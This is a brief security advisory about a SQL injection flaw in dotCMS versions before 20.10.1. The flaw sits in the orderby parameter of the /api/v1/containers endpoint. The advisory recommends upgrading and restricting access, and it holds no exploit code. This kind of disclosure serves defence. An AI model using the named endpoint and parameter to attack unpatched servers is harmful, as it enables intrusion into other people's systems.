Xiaozhicaio

**Name of the Vulnerable Software and Affected Versions** dotCMS versions prior to 20.10.1 **Description** The issue allows SQL injection, as demonstrated by the "/api/v1/containers" endpoint with the `orderby` parameter. The PaginatorOrdered classes used for paginating results of REST endpoints do not sanitize the `orderby` parameter, making it vulnerable to SQL injection attacks in some cases. A user must be an authenticated manager in the dotCMS system to exploit this issue. **Recommendations** For versions prior to 20.10.1, update to version 20.10.1 or later to resolve the issue. As a temporary workaround, consider restricting access to the `/api/v1/containers` endpoint or sanitizing the `orderby` parameter to minimize the risk of exploitation.